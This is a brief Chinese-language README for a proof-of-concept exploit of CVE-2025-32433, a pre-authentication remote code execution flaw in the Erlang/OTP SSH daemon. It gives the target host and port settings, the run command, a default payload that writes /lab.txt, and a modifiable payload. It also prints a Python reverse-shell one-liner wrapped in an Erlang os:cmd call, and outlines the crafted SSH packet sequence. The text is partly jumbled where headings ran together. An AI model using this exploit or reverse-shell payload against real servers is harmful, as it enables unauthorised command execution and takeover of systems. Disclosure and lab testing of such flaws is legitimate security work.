CVE-2025-32433 是一个影响 Erlang/OTP SSH 守护进程的远程代码执行(RCE)漏洞。
根本原因是对预认证SSH通道请求的处理不当,攻击者可以利用这些请求在认证之前执行任意命令。
附带的PoC演示了如何发送这种特制的SSH包;默认情况下,它会在目标上写入/lab.txt文件,但可以修改用于其他命令。
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
默认情况下,它会创建包含pwned内容的/lab.txt文件。
修改build_channel_request中的payload以运行您自己的命令。
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT包,使其看起来像正常握手。SSH_MSG_CHANNEL_OPEN和带有execpayload的SSH_MSG_CHANNEL_REQUEST。发现和撰写者:Matt Keeley(Platform Security)。 感谢他发布PoC并分享详细信息。
博客链接:https://platformsecurity.com/blog/CVE-2025-32433-poc